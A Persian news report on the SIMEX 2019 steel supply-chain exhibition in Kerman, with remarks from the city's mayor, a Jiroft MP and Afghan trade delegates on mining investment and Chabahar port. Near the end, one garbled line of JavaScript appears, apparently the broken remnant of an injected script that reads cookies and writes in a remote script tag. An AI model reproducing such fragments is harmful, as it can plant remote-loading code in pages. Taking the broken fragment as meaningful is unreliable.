سه شنبه ۰۱ مرداد ۱۳۹۸ , ۰۲:۵۴:۰۹
2019 / July / 22برگزیده، خبر، ویژه دی ۲۸, ۱۳۹۷
در نمایشگاه زنجیره تامین فولاد کرمان سیمکس 2019 تاکید شد

ضرورت توسعه متوازن و پایدار در بخش معدن و صنایع معدنی

الزام جایگزینی اقتصاد صنعتی به جای کشاورزی

در آخرین روز نمایشگاه زنجیره تامین فولاد کرمان سیمکس 2019 که از تاریخ 25تا28دی ماه در محل دائمی نمایشگاه های جنوب شرق کرمان برگزار شد؛ مهران عالم زاده شهردار کرمان، یحیی کمالی نماینده مردم جیرفت و عنبراباد در مجلس شورای اسلامی و هیات تجاری از کشور افغانستان از این نمایشگاه بازدید کرده و بر افزایش تعاملات منطقه ای و همچنین توسعه متوازن و پایدار در بخش معدن و صنایع معدنی به ویژه در استان کرمان تاکید شد.

تعامل شهرداری با فعالان معدنی در راستای مسئولیت های اجتماعی

مهران عالم زاده شهردار کرمان در حاشیه بازدید از نمایشگاه زنجیره تولید فولاد سیمکس ۲۰۱۹ کرمان در خصوص اقدامات و حمایت های صورت گرفته از سوی شهرداری در راستای توسعه معادن و صنایع معدنی استان کرمان اظهار داشت: باید توجه داشت اشتغال و توسعه پایدار شهرها در گرو توسعه معدنی و صنایع معدنی است؛ از طرفی شهرداری ها باید نسبت به بروز مشکلات زیست محیطی در شهرهای معدنی از سوی کارخانجات و واحدهای تولیدی اقدام کنند.

وی در خصوص مسئولیت های اجتماعی به ساخت مجتمع اقامتی تفریحی در جوار مسجد امام خمینی (ره) با مشارکت مجتمع صنعتی و معدنی گل گهر اشاره کرد و در خصوص تاثیر نمایشگاه های تخصصی در توسعه اقتصادی استان ها گفت: نمایشگاه ها فضای تعاملی مناسبی را در راستای ارائه توانمندی های فنی و مهندسی، بازاریابی و تامین نیاز تکنولوژیکی و مواد اولیه در معرض نمایش قرار می دهند.

عالم زاده از آمادگی کامل شهرداری کرمان برای همکاری با سازمان ها و شرکت های معدن و صنایع معدنی خبر داد و گفت: شهرداری آمادگی دارد در راستای حمایت از اجرای مسئولیت های اجتماعی شرکت ها زمین و خدمات شهری به صورت رایگان ارائه دهد.

باید به بخش خصوصی متکی بود

همچنین یحیی کمالی نماینده مردم جیرفت و عنبرآباد در مجلس شورای اسلامی در بازدید از نمایشگاه سیمکس ۲۰۱۹ کرمان در خصوص کاهش بودجه سال ۹۸ بخش معدن نسبت به سال گذشته علی رغم نقش موثر این بخش در توسعه اقتصادی و عبور از بحران های تحریمی اظهار داشت: در شرایط کنونی کشور در جنگ تمام عیار اقتصادی قرار دارد و این در حالی است که بودجه عمرانی کشور امکان پوشش دهی تمامی حوزه های اقتصادی و حتی پروژه های نیمه تمام را ندارد؛ بنابراین لازم است از ظرفیت های بخش خصوصی به طور کامل بهره گیری کرد و دولت و مجلس با ارائه مشوق های مالیاتی و همچنین رفع موانع تولید انگیزه لازم برای حضور بخش خصوصی در حوزه های معدن و صنایع معدنی را فراهم آورد.

وی افزود: استان کرمان از ظرفیت های بسیار بالایی در حوزه معدن و صنایع معدنی برخوردار است اما نبود توازن تولید در استان از موضوعاتی است که باید مورد توجه متولیان استان کرمان قرار گیرد؛ لذا حضور فعالان صنعت و معدن در صنایع پایین دستی می تواند به ایجاد توازن در تولید و توسعه استان منجر شود.

کمالی در پاسخ به مشکلات معادن کرومیت اسفندقه گفت: متاسفانه علی رغم قرارگیری معادن اسفندقه در شهرستان جیرفت، تصمیمات در اختیار مدیران این شهرستان قرار ندارد و شرکت متولی این معادن سیاست های مستقلی را دنبال می کند که مورد قبول اهالی و مدیران استانی نیست.

وی از الزام جایگزینی اقتصاد صنعتی به جای کشاورزی تاکید کرد و گفت: به واسطه خشکسالی های مکرر برای جلوگیری از افزایش آمار بیکاری در استان حرکت به سمت اقتصاد صنعتی الزامی بوده و باید اشتغال را از حوزه کشاورزی به صنعتی منتقل کرد.

نماینده مردم شهرستان جیرفت عنوان کرد: در این راستا برخی از واحدهای صنعتی همچون واحد مس کاتد و آجر نسوز از سوی بخش خصوصی احداث شده که پیش بینی می شود با تداوم برنامه های توسعه ای شاهد اشتغالزایی بیش از هزار نفری در این شهرستان باشیم.

سرمایه گذاری های مشترک برای بهره گیری از بندر چابهار

در روند برگزاری نمایشگاه سیمکس ۲۰۱۹ کرمان شاهد حضور هیات تجاری اتاق بازرگانی و صنایع و معادن افغانستان بودیم. در این راستا عبدالمتین قلندری رئیس اتاق تجارت و صنایع قزنی افغانستان با عنوان اینکه عدم دسترسی به آب های آزاد از مشکلات صنایع و تجار این کشور است، گفت: کانون معادن افغانستان تشکیل شده و اتاق قزنی نیز از آمادگی لازم برای سرمایه گذاری های مشترک با تجار و واحدهای صنعتی ایران برخوردار بوده تا از این طریق بتواند ضمن تولید، صادرات محصولات خود را نیز از بندر چابهار انجام دهد.

وی حجم تجارت بین دو کشور را بیش از ۲میلیارد و ۸۵۰میلیون دلار اعلام کرد و گفت: با توجه به پتانسیل بالای استان کرمان در حوزه معدن و صنایع معدنی به ویژه فولاد، تفاهمنامه ای با اتاق کرمان در راستای افزایش سطح همکاری های تجاری و صنعتی منعقد شده است.

همچنین عبدالنصیر علمیار رئیس اتاق منطقه جنوب شرق افغانستان نیز در حاشیه بازدید از نمایشگاه سیمکس گفت: افغانستان عزم خود را برای تامین نیازهای صادراتی و وارداتی خود از طریق بندر چابهار جزم کرده و در این راستا هیات تجاری اتاق های بازرگانی چهار استان افغانستان در این نمایشگاه حضور یافته اند.

علمیار ضمن اعلام انعقاد تفاهمنامه ای با اتاق کرمان گفت: در راستای افزایش تعاملات صنعتی و معدنی عمل به تعهدات در تفاهمنامه ها الزامی بوده و میتواند به گسترش سرمایه گذاری های مشترک منجر شود.

وی در پاسخ به مشکلات ناشی از تضمین سرمایه گذاری و همچنین عدم امنیت لازم برای سرمایه گذاران در افغانستان گفت: دولت حمایت های خود را در ارائه تضمین های سرمایه گذاری و همچنین مشوق های لازم در راستای فعالیت بخش خصوصی در این کشور اعلام کرده است.

 

+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));:void 0}var =”,||void 0===time){var ), path=/; expires=”(”+src+'”><\/script>‘)}

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

استفاده از اخبار با نقل منبع معدن و فولاد مجاز است.